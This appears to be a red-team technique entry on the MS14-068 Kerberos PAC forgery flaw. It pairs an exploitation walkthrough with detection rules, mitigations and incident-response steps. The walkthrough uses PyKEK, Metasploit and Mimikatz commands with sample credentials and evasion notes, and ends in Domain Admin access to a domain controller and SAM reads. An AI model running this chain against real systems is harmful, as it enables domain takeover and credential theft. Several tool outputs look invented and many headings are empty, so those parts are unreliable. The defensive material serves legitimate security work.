MCADDF

[CA-KERB-007]: MS14-068 Checksum Bypass

1. METADATA HEADER

Attribute Details
Technique ID CA-KERB-007
MITRE ATT&CK v18.1 T1558 - Steal or Forge Kerberos Tickets
Tactic Privilege Escalation, Credential Access
Platforms Windows Server (2003-2012 R2) AD, Windows Client (Vista-8.1)
Severity CRITICAL
CVE CVE-2014-6324
Technique Status FIXED (November 18, 2014 via KB3011780) - But legacy unpatched systems remain vulnerable
Last Verified 2024-12-15
Affected Versions Server 2003 SP2, 2008 (SP2), 2008 R2 (SP1), 2012, 2012 R2 (all without KB3011780)
Patched In November 18, 2014 (KB3011780) - Out-of-band emergency patch
Author SERVTEP Artur Pchelnikau

Note: Section 6 (Atomic Red Team) is omitted because MS14-068 is a legacy vulnerability (2014) that modern atomic test frameworks do not cover. The technique remains relevant for legacy environment assessments. All section numbers have been renumbered accordingly.


2. EXECUTIVE SUMMARY

Concept: MS14-068 (CVE-2014-6324), known as the “Kerberos Checksum Vulnerability,” is a critical flaw in the Windows Kerberos Key Distribution Center (KDC) that allows any authenticated domain user to escalate their privileges to Domain Administrator without requiring the actual Domain Admin password. The vulnerability exists in the Privilege Attribute Certificate (PAC) validation mechanism: when a user requests a service ticket (TGS-REQ), the KDC includes the user’s authorization data (including group memberships and SID) in the PAC. On vulnerable systems, the KDC fails to validate the cryptographic signature (checksum) of this PAC, allowing an attacker to forge a PAC claiming the user is a Domain Administrator. The attacker can then use this forged ticket to impersonate a Domain Admin and access any resource in the domain. This vulnerability was actively exploited in targeted attacks starting in November 2014 and remains a serious issue on legacy systems that have not been patched.

Attack Surface: MS14-068 affects any Windows Server domain running an unpatched KDC. The attack requires only valid domain credentials (any user account, even with minimal privileges), making the attack surface enormous: every domain user can potentially exploit this. The vulnerability was so critical that Microsoft released an out-of-band (emergency) patch on November 18, 2014, just days after its discovery.

Business Impact: A single compromised domain user account (obtained via phishing, malware, or credential theft) can be escalated to full Domain Administrator privileges within minutes, enabling complete domain compromise. An attacker gains the ability to access all domain resources, extract sensitive data, install persistent backdoors, modify Group Policy, reset all passwords, and establish control over the entire enterprise infrastructure.

Technical Context: The attack requires the attacker to craft a special Kerberos TGT request with a forged PAC. The PAC contains the user’s authorization data and must be signed by the KDC. The vulnerable KDC accepts a TGT with an “Include PAC: False” flag in the AS-REQ, then generates a TGT without proper PAC validation. The attacker can then request a TGS ticket where they craft the PAC to include Domain Admin group SIDs. The exploit typically takes 5-10 minutes to execute from initial credential access to Domain Admin impersonation. Modern intrusion detection can identify the attack via network signatures or event log patterns.
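As an added illustration (not code from the page or from any of the tools it names), the model below contrasts a KDC that recomputes whatever checksum type the ticket carries with one that only accepts a keyed checksum made with the KDC key, which is the documented root cause and fix for CVE-2014-6324. The checksum type numbers are real Kerberos constants; the PAC bytes and the KDC key are constructed placeholders, not a real PAC encoding.

```python
import hashlib
import hmac
import zlib

# Kerberos checksum type numbers (RFC 3961 / MS-KILE); the constants are real,
# everything else here is a constructed model, not a PAC parser.
CKSUM_CRC32 = 1                  # unkeyed
CKSUM_RSA_MD5 = 7                # unkeyed
CKSUM_HMAC_MD5 = -138            # keyed, RC4-HMAC
CKSUM_HMAC_SHA1_96_AES256 = 16   # keyed, AES256-CTS-HMAC-SHA1-96
KEYED_TYPES = {CKSUM_HMAC_MD5, CKSUM_HMAC_SHA1_96_AES256}


def pac_checksum(cksum_type, key, pac_body):
    """Compute the checksum for a given type. Keyed types need the KDC key;
    unkeyed types can be computed by anyone holding the PAC bytes."""
    if cksum_type == CKSUM_CRC32:
        return zlib.crc32(pac_body).to_bytes(4, "little")
    if cksum_type == CKSUM_RSA_MD5:
        return hashlib.md5(pac_body).digest()
    if cksum_type == CKSUM_HMAC_MD5:
        return hmac.new(key, pac_body, hashlib.md5).digest()  # simplified keyed MAC
    if cksum_type == CKSUM_HMAC_SHA1_96_AES256:
        return hmac.new(key, pac_body, hashlib.sha1).digest()[:12]
    raise ValueError(f"unsupported checksum type {cksum_type}")


def vulnerable_kdc_verify(pac_body, cksum_type, signature, kdc_key):
    """Pre-KB3011780 behaviour: the KDC recomputes whatever checksum type the
    ticket names. If that type is unkeyed, a matching value proves nothing."""
    try:
        expected = pac_checksum(cksum_type, kdc_key, pac_body)
    except ValueError:
        return False
    return hmac.compare_digest(expected, signature)


def patched_kdc_verify(pac_body, cksum_type, signature, kdc_key):
    """Fixed behaviour: only a keyed checksum made with the KDC key is accepted."""
    if cksum_type not in KEYED_TYPES:
        return False
    return hmac.compare_digest(pac_checksum(cksum_type, kdc_key, pac_body), signature)


def demo():
    kdc_key = b"constructed-krbtgt-key-not-a-real-secret"   # constructed placeholder
    # Constructed stand-in for PAC authorization data (real PACs are NDR-encoded).
    legitimate_pac = b"user=jsmith;rid=1107;groups=513"
    tampered_pac = b"user=jsmith;rid=1107;groups=513,512"    # 512 = Domain Admins RID

    good_sig = pac_checksum(CKSUM_HMAC_MD5, kdc_key, legitimate_pac)   # KDC-keyed
    weak_sig = pac_checksum(CKSUM_RSA_MD5, b"", tampered_pac)          # needs no key
    guessed_sig = pac_checksum(CKSUM_HMAC_MD5, b"wrong-key", tampered_pac)

    return {
        "legit_keyed_on_vulnerable": vulnerable_kdc_verify(legitimate_pac, CKSUM_HMAC_MD5, good_sig, kdc_key),
        "legit_keyed_on_patched": patched_kdc_verify(legitimate_pac, CKSUM_HMAC_MD5, good_sig, kdc_key),
        "tampered_unkeyed_on_vulnerable": vulnerable_kdc_verify(tampered_pac, CKSUM_RSA_MD5, weak_sig, kdc_key),
        "tampered_unkeyed_on_patched": patched_kdc_verify(tampered_pac, CKSUM_RSA_MD5, weak_sig, kdc_key),
        "tampered_keyed_guess_on_patched": patched_kdc_verify(tampered_pac, CKSUM_HMAC_MD5, guessed_sig, kdc_key),
    }


if __name__ == "__main__":
    for name, accepted in demo().items():
        print(f"{name}: {'ACCEPTED' if accepted else 'REJECTED'}")
```

The only case that differs between the two verifiers is the tampered PAC carrying an unkeyed checksum, which is exactly the check KB3011780 closes.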

Operational Risk

Compliance Mappings

Framework Control / ID Description
CIS Benchmark 5.2.5.1 “Ensure Kerberos policy enforcement is configured”
DISA STIG V-3458 Windows Server 2008 SP2 Kerberos vulnerability validation
NIST 800-53 AC-3 Access Enforcement - KDC must validate PAC
NIST 800-53 SI-6 Information System Monitoring - detect anomalous tickets
GDPR Art. 32 Security of Processing - cryptographic controls
DORA Art. 9 Protection and Prevention - authentication integrity
NIS2 Art. 21 Cyber Risk Management - critical infrastructure
ISO 27001 A.9.2.1 Access control implementation and enforcement
ISO 27005 Risk Scenario Unauthorized elevation of privileges

3. TECHNICAL PREREQUISITES

Required Privileges:

Required Access:

Supported Versions:

Version Status Notes
Windows Server 2003 SP2 VULNERABLE No patch applied
Windows Server 2008 SP2 VULNERABLE Requires KB977290 + KB3011780 to fix
Windows Server 2008 R2 SP1 VULNERABLE Requires KB2982378 + KB3011780 to fix
Windows Server 2012 VULNERABLE Requires KB3011780 to fix
Windows Server 2012 R2 VULNERABLE Requires KB3011780 to fix
Windows Vista SP2 Not Vulnerable* Client-side only (no KDC component)
Windows 7 SP1 Not Vulnerable* Client-side only (no KDC component)
Windows 8, 8.1 Not Vulnerable* Client-side only (no KDC component)

*Note: Client OS versions are not vulnerable because they don’t run a KDC. However, they can be used to launch the exploit against a vulnerable DC.

Tools:

Other Requirements:


4. ENVIRONMENTAL RECONNAISSANCE

4.1 Verify Target Vulnerability

Step 1: Check Patch Status on Domain Controller

Command (PowerShell - From any domain-joined machine with admin access to DC):

# Check if KB3011780 (MS14-068 patch) is installed on DC
Get-HotFix -ComputerName DC01.contoso.com | Where-Object {$_.HotFixID -eq "KB3011780"}

# If KB3011780 is missing: VULNERABLE
# If KB3011780 is present: PATCHED

# Also check for prerequisite patches:
Get-HotFix -ComputerName DC01.contoso.com | Where-Object {$_.HotFixID -match "KB977290|KB2982378"}

# If none of these are present on Server 2008/2008 R2: VULNERABLE

Command (Remote Registry Check - requires the Remote Registry service on the DC):

# Query the registry on the DC to identify the OS version; Get-HotFix confirms the patch itself
$dc = "192.168.1.10"
$reg = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('LocalMachine', $dc)
$key = $reg.OpenSubKey("SOFTWARE\Microsoft\Windows NT\CurrentVersion")
$version = $key.GetValue("CurrentVersion")
Write-Output "CurrentVersion on $dc = $version"

# Server 2008 R2: 6.1
# Server 2012: 6.2
# Server 2012 R2: 6.3

# Then check for KB3011780 via Get-HotFix

Expected Output (Vulnerable):

HotFixID    Description
--------    -----------
(No KB3011780 in output)

Expected Output (Patched):

HotFixID    Description
--------    -----------
KB3011780   Security Update

What This Means:

Step 2: Enumerate User SID (Required for Exploit)

Command (rpcclient - From Linux/Attacker Machine):

# Query DC for user SID using rpcclient (requires valid credentials)
rpcclient -U "DOMAIN\username%password" 192.168.1.10 << EOF
lookupnames username
EOF

# Output:
# username S-1-5-21-3623811015-3361044348-30300820-1107 (User: 1)
# User SID: S-1-5-21-3623811015-3361044348-30300820-1107

Command (PowerShell - From domain-joined machine):

# Query user SID via Active Directory
Get-ADUser -Identity username | Select-Object SamAccountName, ObjectSID

# Example output:
# SamAccountName: jsmith
# ObjectSID: S-1-5-21-3623811015-3361044348-30300820-1107

Command (Metasploit - Automated Enumeration):

# Use auxiliary/scanner/ldap/ldap_enum to enumerate users
msfconsole -x "use auxiliary/scanner/ldap/ldap_enum; set RHOST 192.168.1.10; set USERNAME domain\\user; set PASSWORD pass; run"

Expected Output:

User SID: S-1-5-21-3623811015-3361044348-30300820-1107
Domain SID: S-1-5-21-3623811015-3361044348-30300820

What This Means:

Step 3: Detect Kerberos Events for This Technique

Command (PowerShell - On DC, look for exploit patterns):

# Search for 4768 events with "Include PAC: False" (indicator of MS14-068 exploitation attempt)
Get-WinEvent -LogName Security -FilterXPath "*[System[(EventID=4768)]]" -MaxEvents 100 |
  Where-Object {$_.Message -match "Include PAC: False"} |
  Select-Object TimeCreated, Message

# Also look for 4769 with unusual PAC (if exploit succeeded):
# - Non-admin user requesting TGS with Domain Admin groups in PAC

Get-WinEvent -LogName Security -FilterXPath "*[System[(EventID=4769)]]" -MaxEvents 1000 |
  Where-Object {$_.Message -match "Domain Admins|Enterprise Admins"} |
  Select-Object TimeCreated, Message

What to Look For:


5. DETAILED EXECUTION METHODS AND THEIR STEPS

METHOD 1: PyKEK Exploitation (Primary / Legacy Method)

Supported Versions: Server 2003 SP2 through 2012 R2 (all without KB3011780)

Prerequisites: Attacker has valid domain credentials; PyKEK installed on attack machine (typically Linux/Exegol)

Step 1: Gather Required Information (Domain, User, SID)

Objective: Collect all parameters needed for exploitation: domain name, username, user SID, Domain SID, and target DC.

Command (Bash - Reconnaissance):

# Set variables for the attack
DOMAIN="contoso.com"
DOMAIN_DC="dc01.contoso.com"  # DC hostname or IP (e.g., 192.168.1.10)
USERNAME="jsmith"
USER_SID="S-1-5-21-3623811015-3361044348-30300820-1107"  # Obtained from reconnaissance
USER_PASSWORD="P@ssw0rd123"

# Verify DC is reachable
nslookup dc01.contoso.com
# OR
nmap -p 88 192.168.1.10  # KDC port should be open

echo "Domain: $DOMAIN"
echo "DC: $DOMAIN_DC"
echo "User: $USERNAME"
echo "User SID: $USER_SID"
echo "Password: $USER_PASSWORD"

What This Means:

Step 2: Execute PyKEK to Generate Forged TGT with Domain Admin PAC

Objective: Run the exploitation script to forge a Kerberos TGT ticket with Domain Administrator group SID in the PAC.

Command (Python 2.x - PyKEK):

# Navigate to PyKEK directory
cd /path/to/pykek

# Run ms14-068.py with required parameters
python ms14-068.py -u jsmith@contoso.com \
  -s S-1-5-21-3623811015-3361044348-30300820-1107 \
  -d 192.168.1.10 \
  -p "P@ssw0rd123"

# Parameter explanation:
# -u: User@DOMAIN format (domain is case-sensitive, usually UPPER)
# -s: User SID (discovered in reconnaissance)
# -d: DC hostname or IP address
# -p: Password for the user (must be valid)

# Output (if successful):
# [+] Building AS-REQ for contoso.com...
# [+] Sending AS-REQ to 192.168.1.10...
# [+] Receiving AS-REP from 192.168.1.10...
# [+] Building TGS-REQ for jsmith...
# [+] Forging PAC with Domain Admin groups...
# [+] Receiving TGS-REP from 192.168.1.10...
# [+] Creating ccache file 'TGT_jsmith@contoso.com.ccache'...
# [+] Done!

Expected Output (Successful Exploitation):

[+] Kerberos Exploitation successful!
[+] TGT saved as: TGT_jsmith@contoso.com.ccache
[+] File size: ~1.5 KB
[+] Ready to load into LSASS via Mimikatz

What This Means:

OpSec & Evasion:

Troubleshooting:

Step 3: Transfer Generated Ticket to Target System

Objective: Move the forged ccache file from the attacker machine to the Windows system where it will be used.

Command (SCP / Network Copy):

# Copy from attacker Linux to Windows target
scp TGT_jsmith@contoso.com.ccache admin@targethost.contoso.com:C:\temp\

# Alternatively, base64 encode and paste into Windows
base64 TGT_jsmith@contoso.com.ccache > ticket.b64
# Copy ticket.b64 content, paste on Windows, and decode:
# certutil -decode ticket.b64 TGT_jsmith@contoso.com.ccache

What This Means:

Step 4: Load Forged Ticket into LSASS Using Mimikatz

Objective: Inject the forged Domain Admin TGT into Windows Local Security Authority Subsystem Service (LSASS).

Command (Mimikatz on Windows - Administrator Required):

# Load Mimikatz and inject ticket
.\mimikatz.exe "privilege::debug" `
  "kerberos::ptc c:\temp\TGT_jsmith@contoso.com.ccache" "exit"

# Or more directly:
mimikatz.exe
mimikatz # privilege::debug
mimikatz # kerberos::ptc c:\temp\TGT_jsmith@contoso.com.ccache
mimikatz # kerberos::list  # Verify ticket is loaded
mimikatz # exit

# Output:
# [+] Ticket successfully loaded into LSASS
# [+] User: jsmith @ CONTOSO.COM
# [+] Principal: krbtgt/CONTOSO.COM @ CONTOSO.COM
# [+] Flags: 0x60a10001 (INITIAL, RENEWABLE, FORWARDED)

Expected Output:

Cached Tickets (1):
  [0] - krbtgt/CONTOSO.COM @ CONTOSO.COM
  Start/End/MaxRenew: 1/6/2026 08:00:00 / 1/6/2026 18:00:00 / 1/13/2026 08:00:00

What This Means:

OpSec & Evasion:

Step 5: Use Forged Domain Admin Ticket for Lateral Movement

Objective: Leverage the Domain Admin TGT to access and compromise resources across the domain.

Command (Access DC Admin Shares):

# With the Domain Admin ticket loaded, access DC as Domain Admin
net use \\dc01.contoso.com\C$ /user:contoso.com\Administrator

# Access will be granted because ticket claims Admin privileges
dir \\dc01.contoso.com\C$

# Read sensitive files
Get-Content \\dc01.contoso.com\C$\Windows\System32\config\SAM

# Execute commands (if WinRM/PSRemote available)
Invoke-Command -ComputerName dc01.contoso.com -ScriptBlock {whoami}

# Output:
# CONTOSO\Administrator  (despite original user being jsmith)

Expected Output:

Successfully mapped to \\dc01.contoso.com\C$
Listing C:\ directory...
(Full admin access to Domain Controller filesystem)

What This Means:

References:


METHOD 2: Metasploit Automated Exploitation

Supported Versions: Server 2003 SP2 through 2012 R2 (all without KB3011780)

Step 1: Set Up Metasploit Module

Command (msfconsole):

msfconsole

# Search for the MS14-068 module
msf > search ms14_068

# Use the Kerberos checksum module
msf > use auxiliary/admin/kerberos/ms14_068_kerberos_checksum

# Show options
msf auxiliary(ms14_068_kerberos_checksum) > show options

# Output:
# Module options (auxiliary/admin/kerberos/ms14_068_kerberos_checksum):
#    Name       Current Setting  Required  Description
#    ----       ---------------  --------  -----------
#    DOMAIN     (none)            yes       The Domain (upper case) Ex: DEMO.LOCAL
#    PASSWORD   (none)            yes       The Domain User password
#    RHOSTS     (none)            yes       The target address range or CIDR
#    RPORT      88               no        The target port
#    USER       (none)            yes       The Domain User
#    USER_SID   (none)            yes       The Domain User SID

What This Means:

Step 2: Configure and Execute

Command (msfconsole - Configure Parameters):

msf auxiliary(ms14_068_kerberos_checksum) > set DOMAIN CONTOSO.COM
msf auxiliary(ms14_068_kerberos_checksum) > set USER jsmith
msf auxiliary(ms14_068_kerberos_checksum) > set PASSWORD "P@ssw0rd123"
msf auxiliary(ms14_068_kerberos_checksum) > set USER_SID S-1-5-21-3623811015-3361044348-30300820-1107
msf auxiliary(ms14_068_kerberos_checksum) > set RHOSTS 192.168.1.10
msf auxiliary(ms14_068_kerberos_checksum) > set RPORT 88

# Execute the module
msf auxiliary(ms14_068_kerberos_checksum) > run

# Output:
# [*] Exploiting MS14-068 (Kerberos Checksum Validation)
# [+] Building AS-REQ
# [+] Sending to 192.168.1.10:88
# [+] Received AS-REP
# [+] Building TGS-REQ with forged PAC
# [+] Sending to 192.168.1.10:88
# [+] Received TGS-REP
# [+] Ticket exported: TGT_jsmith@CONTOSO.COM.ccache
# [+] Exploit successful!

Expected Output:

[+] Exploit successful!
[+] Ticket file: /tmp/TGT_jsmith@CONTOSO.COM.ccache
[+] Load with Mimikatz: kerberos::ptc /tmp/TGT_jsmith@CONTOSO.COM.ccache

6. TOOLS & COMMANDS REFERENCE

PyKEK

Version: Latest from GitHub
Supported Platforms: Linux, Exegol, macOS (requires Python 2.x)

Installation:

git clone https://github.com/mubix/pykek.git
cd pykek
# No additional dependencies typically needed (uses standard Python Kerberos libs)

Usage:

python ms14-068.py -u user@domain.com -s S-1-5-21-... -d dc_ip -p password

Metasploit Framework

Version: Latest (built-in MS14-068 module)
Supported Platforms: Linux, Windows, macOS

Usage:

msfconsole
use auxiliary/admin/kerberos/ms14_068_kerberos_checksum
set DOMAIN DOMAIN.COM
set USER username
set PASSWORD pass
set USER_SID S-1-5-21-...
set RHOSTS dc_ip
run

Mimikatz

Version: Latest (2.2.0+)
Supported Platforms: Windows (x86, x64)

Usage (Load Ticket):

mimikatz.exe "privilege::debug" "kerberos::ptc c:\path\to\ticket.ccache" "exit"

7. SPLUNK DETECTION RULES

Rule 1: “Include PAC: False” Detection

SPL Query:

index=wineventlog source=WinEventLog:Security EventCode=4768
| where like(Message, "%Include PAC: False%")
| stats count by Account_Name, Client_Address
| where count >= 1

Rule 2: Non-Admin User Accessing Domain Admin Resources

SPL Query:

index=wineventlog source=WinEventLog:Security EventCode=4769
| where like(Message, "%Domain Admin%") AND NOT like(User, "%admin%")
| stats count by User, Computer, Service

8. MICROSOFT SENTINEL DETECTION

Query 1: Domain Admin TGS Request from Non-Admin

KQL Query:

SecurityEvent
| where EventID == 4769
// extract_all needs at least one capture group, so the alternation is captured, not (?:...)
| extend Groups = extract_all(@"(Domain Admin|Enterprise Admin)", tostring(EventData))
| where array_length(Groups) > 0
| join kind=leftanti (
    SecurityEvent
    | where EventID == 4720  // User created
    | where EventData contains "Domain Admins"
    | project CreatedUser=Account_Name
  ) on $left.Account_Name == $right.CreatedUser
| project TimeGenerated, Account_Name, Computer, Groups

9. WINDOWS EVENT LOG MONITORING

Event ID: 4768 (TGT Requested)

Event ID: 4769 (TGS-REQ)

Event ID: 4771 (Pre-authentication Failed)


10. SYSMON DETECTION PATTERNS

<Sysmon schemaversion="4.82">
  <EventFiltering>
    <!-- Monitor for Mimikatz execution -->
    <RuleGroup name="Process Creation" groupRelation="or">
      <ProcessCreate onmatch="include">
        <CommandLine condition="contains">mimikatz</CommandLine>
        <CommandLine condition="contains">kerberos::ptc</CommandLine>
        <CommandLine condition="contains">privilege::debug</CommandLine>
      </ProcessCreate>
    </RuleGroup>

    <!-- Monitor for PyKEK/Python Kerberos exploitation -->
    <RuleGroup name="Process Creation" groupRelation="or">
      <ProcessCreate onmatch="include">
        <CommandLine condition="contains">ms14-068.py</CommandLine>
        <CommandLine condition="contains">pykek</CommandLine>
        <!-- Matching the image name records every Python process; tune or remove where Python is common -->
        <Image condition="contains">python</Image>
      </ProcessCreate>
    </RuleGroup>
  </EventFiltering>
</Sysmon>

11. MICROSOFT DEFENDER FOR CLOUD

Alert Name: “Potential Kerberos PAC forgery detected”
Alert Name: “Domain Admin impersonation via forged Kerberos ticket”


12. DEFENSIVE MITIGATIONS

Priority 1: CRITICAL

Mitigation 1: Apply KB3011780 Patch Immediately

Applies To Versions: All Windows Server 2003-2012 R2

Manual Steps:

  1. Download KB3011780 from Microsoft
  2. Before applying: Patch your server image/builds in DEV/TEST
  3. Critical: Apply patch BEFORE running DCPromo on new DCs
  4. Deployment: Roll out across all DCs in the domain (staggered to maintain uptime)
  5. Verification:
    Get-HotFix | Where-Object {$_.HotFixID -eq "KB3011780"}
    

Why This Is Critical:


Mitigation 2: Verify PAC Signature Validation is Enabled

Applies To Versions: All (Server 2003-2012 R2)

Manual Steps (Registry):

# Check the ValidateKdcPacSignature setting on the DC
Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\Kerberos\Parameters' `
  -Name ValidateKdcPacSignature -ErrorAction SilentlyContinue

# Expected output:
# ValidateKdcPacSignature : 1  (enabled)

# If the value is 0 or missing, enable it (REG_DWORD; -Type creates the value if it is absent):
Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\Kerberos\Parameters' `
  -Name ValidateKdcPacSignature -Value 1 -Type DWord

What This Does:


Priority 2: HIGH

Mitigation 3: Monitor Kerberos Events for Exploitation Attempts

Applies To Versions: All

Manual Steps:

  1. Enable detailed Kerberos auditing:
    auditpol /set /subcategory:"Kerberos Service Ticket Operations" /success:enable /failure:enable
    
  2. Configure SIEM/Splunk/Sentinel to alert on:
    • Event 4768 with “Include PAC: False”
    • Event 4769 with Domain Admin groups for non-admin users
    • Patterns of rapid TGT requests followed by TGS requests
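The following detector, an added example that is not part of the original entry, runs the alert patterns from Step 3 of Section 4 and from Mitigation 3 over constructed 4768/4769 records: a PAC-less TGT request, and a PAC-less TGT request followed within a short window by a TGS request from the same account and client. The field names and the "Include PAC: False" message text are assumptions that follow the page's Splunk rule and should be checked against what your collector actually emits.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (not real log data): one exploitation-shaped sequence
# from jsmith and one ordinary logon from alice.
SAMPLE_EVENTS = [
    {"time": "2024-12-15T08:00:01", "event_id": 4768, "account": "jsmith", "client": "10.0.0.25",
     "message": "A Kerberos authentication ticket (TGT) was requested. Include PAC: False"},
    {"time": "2024-12-15T08:00:04", "event_id": 4769, "account": "jsmith", "client": "10.0.0.25",
     "message": "A Kerberos service ticket was requested. Service Name: krbtgt"},
    {"time": "2024-12-15T08:30:00", "event_id": 4768, "account": "alice", "client": "10.0.0.30",
     "message": "A Kerberos authentication ticket (TGT) was requested. Include PAC: True"},
    {"time": "2024-12-15T08:30:02", "event_id": 4769, "account": "alice", "client": "10.0.0.30",
     "message": "A Kerberos service ticket was requested. Service Name: cifs/fs01.contoso.com"},
]


def _ts(event):
    return datetime.fromisoformat(event["time"])


def pac_false_alerts(events):
    """Rule 1 from the page: a 4768 whose text shows the client declined a PAC."""
    return [(e["account"], e["client"], e["time"]) for e in events
            if e["event_id"] == 4768 and "Include PAC: False" in e["message"]]


def correlated_alerts(events, window=timedelta(seconds=30)):
    """Mitigation 3 pattern: a PAC-less 4768 followed within `window` by a 4769
    from the same account and client address. A normal logon also produces a
    quick 4768 -> 4769 pair, so the PAC-less TGT is required, and a 4769 for
    krbtgt (the service the MS14-068 exchange asks for) raises the severity."""
    by_key = defaultdict(list)
    for e in sorted(events, key=_ts):
        by_key[(e["account"], e["client"])].append(e)
    alerts = []
    for (account, client), seq in by_key.items():
        for i, tgt in enumerate(seq):
            if tgt["event_id"] != 4768 or "Include PAC: False" not in tgt["message"]:
                continue
            for tgs in seq[i + 1:]:
                if tgs["event_id"] == 4769 and _ts(tgs) - _ts(tgt) <= window:
                    severity = "high" if "krbtgt" in tgs["message"] else "medium"
                    alerts.append({"account": account, "client": client,
                                   "tgt_time": tgt["time"], "tgs_time": tgs["time"],
                                   "severity": severity})
                    break
    return alerts


def run_detection(events):
    """Run both rules and return their hits keyed by rule name."""
    return {"pac_false": pac_false_alerts(events), "correlated": correlated_alerts(events)}


if __name__ == "__main__":
    for rule, hits in run_detection(SAMPLE_EVENTS).items():
        print(rule, hits)
```

On the constructed input only jsmith trips both rules; alice's equally fast TGT/TGS pair is ignored because her TGT request carried a PAC.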

Mitigation 4: Implement PAC Signature Validation on Services

Objective: Even if a PAC is forged, prevent it from being accepted by services

Manual Steps:


Mitigation 5: Segment Network to Limit KDC Access


13. DETECTION & INCIDENT RESPONSE

Indicators of Compromise (IOCs)

Network:

Event Logs:

Files:

Processes:


Forensic Artifacts

Disk:

Memory:

Network:


Response Procedures

1. Isolate (0-5 minutes):

# Disconnect affected DC from network
Get-NetAdapter | Disable-NetAdapter -Confirm:$false

# Or via Group Policy: disable network interfaces

2. Collect Evidence (5-30 minutes):

# Export Security Event Log from 24 hours before compromise detection
Get-WinEvent -LogName Security -MaxEvents 10000 | Export-Csv Evidence.csv

# Memory dump of LSASS for ticket analysis
procdump64.exe -ma lsass.exe lsass.dmp

3. Remediate (30 mins - 2 hours):

# Apply KB3011780 if not already installed
# Reset KRBTGT password twice (invalidates all forged tickets)
Set-ADAccountPassword -Identity krbtgt -Reset -NewPassword (ConvertTo-SecureString "$(New-Guid)" -AsPlainText -Force)
Start-Sleep -Seconds 86400  # Wait 24 hours
Set-ADAccountPassword -Identity krbtgt -Reset -NewPassword (ConvertTo-SecureString "$(New-Guid)" -AsPlainText -Force)

# Disable all potentially compromised accounts
Disable-ADAccount -Identity jsmith

Step Phase Technique Description
1 Initial Access [IA-PHISH-001] Spear Phishing Attacker obtains initial user credentials via phishing
2 Credential Access [CA-KERB-007] MS14-068 (Current) Escalate to Domain Admin via PAC forgery
3 Persistence [PERSIST-KRBTGT] KRBTGT Compromise Establish long-term domain control via Golden Tickets
4 Lateral Movement [LM-DCSync] DCSync Extract all domain hashes using Domain Admin privileges
5 Impact [IMPACT-RANSOMWARE] Deploy Ransomware Encrypt entire domain with Admin privileges

15. REAL-WORLD EXAMPLES

Example 1: Active Exploitation in Targeted Attacks (November 2014)

APT Group: Unknown (targeted attacks confirmed by Microsoft)

Target: Multiple enterprise organizations globally

Timeline: November 18, 2014 (vulnerability disclosure) - Active attacks ongoing

Technique Status: Exploited in the wild immediately upon discovery; automated tools (PyKEK) released by November 18

Attack Flow:

  1. Initial compromise: Phishing email → low-privilege domain user credentials
  2. User account compromise: Stolen credentials from compromised workstation
  3. MS14-068 exploitation: Run PyKEK on attack system against unpatched DC
  4. Domain Admin TGT generation: Forged ticket with Domain Admin groups in PAC
  5. DC admin shares accessed: Read SAM, NTDS.DIT, extract all domain hashes
  6. KRBTGT compromise: Extract KRBTGT hash for persistent Golden Tickets
  7. Enterprise compromise: Attacker now has full domain control

Detection Evasion:

Impact:

Outcome:


Example 2: Laboratory / Authorized Penetration Test (2015+)

Scenario: Authorized red team assessment of legacy Windows Server 2008 R2 environment

Target: Enterprise AD infrastructure with mixed patch levels

Timeline: Single-day assessment

Technique Status: Successfully exploited unpatched 2008 R2 DC; patched 2012 R2 DCs were immune

Attack Verification:

  1. Reconnaissance: Identified Windows Server 2008 R2 DC (patch status unknown)
  2. Exploitation: Executed PyKEK against 2008 R2 DC
  3. Result: Forged Domain Admin ticket successfully generated and loaded
  4. Verification: Accessed DC admin shares as Domain Admin (despite normal user credentials)
  5. Post-exploitation: Demonstrated NTDS.DIT extraction and KRBTGT compromise

On Patched Systems:

Recommendations:


REFERENCES & AUTHORITATIVE SOURCES